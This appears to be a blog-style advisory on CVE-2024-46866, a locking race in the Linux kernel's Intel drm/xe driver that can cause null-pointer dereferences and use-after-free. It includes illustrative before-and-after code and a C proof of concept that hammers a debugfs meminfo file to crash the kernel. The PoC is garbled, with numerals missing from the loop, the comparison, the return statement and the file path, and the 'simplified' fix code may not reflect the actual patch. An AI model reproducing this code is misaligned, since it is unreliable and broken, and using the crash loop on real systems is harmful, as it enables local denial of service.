CVE-2024-46866 - Linux Kernel drm/xe memory info Race Condition

## Overview of CVE-2024-46866

In June 2024, a significant vulnerability (CVE-2024-46866) was patched in the Linux kernel's new drm/xe graphics driver. This issue involved improper locking in the show_meminfo() function, leading to possible race conditions, null pointer dereferences (NPDs), and use-after-free (UAF) bugs due to the way buffer object (BO) memory info was accessed.

In simple terms: The Linux kernel accidentally let one thread mess with a graphics memory object at the same time another thread was reading it — and that could cause crashes or worse.

## What is Affected

- Component: drivers/gpu/drm/xe/xe_client.c

Function: show_meminfo(), which calls bo_meminfo()

- Kernel Versions: Mainline kernels (before the fix merged), specifically any kernel with the Intel XE DRM driver feature between introduction and patch commit.

## How the Vulnerability Works

The show_meminfo() debugfs function lets userspace read info about current graphics buffer objects (BOs). Internally, it loops over all BOs, calling bo_meminfo() for details.

The problem:
bo_meminfo() looked at dynamic state of a BO (such as Translation Table, TTM resource pointers) without locking the BO — which is totally unsafe in a multi-threaded kernel. Other threads could free or modify the BO at the same time, leading to:

- Null Pointer Dereference (NPD): Code tries to access a member of a struct, but the pointer is NULL.
- Use After Free (UAF): Code uses memory after it’s already been freed, leading to kernel panics or, sometimes, privilege escalation.

Code Walkthrough (Before the Fix)

// This snippet is for illustration only
int bo_meminfo(struct xe_bo *bo, ...) {
    // No locking here!
    if (bo->tt) {
        // Potential NPD if another thread freed bo->tt just now!
    }
    if (bo->ttm_resource) {
        // Potential Use-After-Free...
    }
}

Because the call was not protected by the bo lock, any user on the system who could read /sys/kernel/debug/dri/*/meminfo or similar debugfs could trigger a race condition by rapidly requesting memory info, possibly while other operations freed or changed BOs.

## How it was Fixed

The patch addressed the issue by grabbing the BO lock before calling bo_meminfo(). If the code was holding a spinlock over the whole object walk, it now drops it individually before fetching per-BO data (locking each BO, then releasing after).

The patch also added a check with xe_bo_assert_held() to make sure the lock is in fact held during dangerous accesses.

Code After Fix (Simplified)

// Now, proper locking!
int bo_meminfo(struct xe_bo *bo, ...) {
    xe_bo_assert_held(bo); // DEBUG: are we holding the lock?
    // Now it's safe to access bo->tt, bo->ttm_resource, etc.
}

// In the for-each-BO loop:
spin_unlock(&object_list_lock); // Drop global lock
mutex_lock(&bo->lock);          // Grab per-object lock
bo_meminfo(bo, ...);
mutex_unlock(&bo->lock);        // Release after
spin_lock(&object_list_lock);   // Resume

See the actual patch:
drm/xe/client: add missing bo locking in show_meminfo()

## Exploiting CVE-2024-46866

While this bug is easiest to hit for local users (with access to DRM debugfs), here’s a hypothetical local DoS/Crash PoC in C:

// Simple illustration: Rapidly read meminfo to trigger race
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>

int main() {
    int fd, i;
    char buf[4096];

    for (i = ; i < 10000; i++) {
        fd = open("/sys/kernel/debug/dri//xe_meminfo", O_RDONLY);
        if (fd < ) {
            perror("open");
            break;
        }
        read(fd, buf, sizeof(buf));
        close(fd);
    }
    return ;
}

At the same time, another process could be rapidly allocating and freeing buffer objects (via, e.g., Vulkan or OpenCL API calls), increasing chances of a race.

Results:
With the right timing, this could cause a kernel panic/logs like BUG: unable to handle kernel NULL pointer dereference or other Oops.

## Original References

Patch Commit:

drm/xe/client: add missing bo locking in show_meminfo() (commit 4f63d712fa104c3ebefcb289d1e733e86d8698c7)

Debian security tracker:

CVE-2024-46866

Linux Kernel Mailing List:

https://lore.kernel.org/all/20240610092929.28295-1-matthew.brophy@intel.com/

## Closing Thoughts

CVE-2024-46866 teaches a vital lesson: Always use proper locking in the kernel, especially around shared resources. Race conditions are subtle, but they can lead to hard-to-find security bugs. Luckily, the Linux kernel devs patched this one fast.

If your Linux system uses the Intel XE DRM driver, make sure to update to a kernel with commit 4f63d712fa104c3ebefcb289d1e733e86d8698c7 or later, or check your distro's security advisories.

Timeline

Published on: 09/27/2024 13:15:17 UTC
Last modified on: 10/01/2024 17:09:30 UTC